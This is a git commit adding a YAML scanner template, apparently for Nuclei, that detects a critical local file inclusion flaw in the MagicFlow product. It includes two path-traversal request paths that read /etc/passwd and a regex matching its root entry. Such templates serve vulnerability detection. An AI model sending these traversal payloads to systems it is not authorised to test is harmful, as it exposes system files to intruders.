Create magicflow-lfi.yaml

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
patch-1
GwanYeong Kim 2021-07-21 14:18:00 +09:00
parent 9cadadca8e
commit 16750fd9a2
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: magicflow-lfi
info:
name: MagicFlow - Local File Inclusion
author: gy741
severity: critical
reference: https://www.seebug.org/vuldb/ssvid-89258
tags: magicflow,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
- "{{BaseURL}}/msa/../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200